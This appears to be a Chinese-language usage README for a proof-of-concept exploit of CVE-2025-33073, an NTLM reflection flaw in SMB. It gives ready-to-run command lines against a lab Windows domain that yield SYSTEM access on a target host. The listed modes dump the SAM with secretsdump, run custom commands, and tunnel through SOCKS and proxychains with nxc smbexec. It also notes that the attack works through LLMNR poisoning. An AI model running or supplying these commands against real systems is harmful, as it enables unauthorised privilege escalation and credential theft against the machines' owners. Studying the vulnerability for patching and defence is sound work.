针对 NTLM 反射 SMB 漏洞的 PoC 利用程序。
操作系统:Kali Linux(已预装大部分软件包)。
GUI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

CLI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

自定义命令
除了运行 secretsdump 之外,还可以执行自定义命令。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS
用于在成功以 SYSTEM 身份建立有效连接后更隐蔽地执行命令。此处 --target 和 --target-ip 应相同。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
此外,也可以通过 proxychains 运行自定义命令,而不是转储 SAM。
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

如果您与目标设备处于同一广播域,且该设备易受 LLMNR 投毒攻击,则无需注册 DNS 记录即可利用该设备。

发生本地 NTLM 身份验证

未发生本地 NTLM 身份验证,导致尝试 FAILED

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073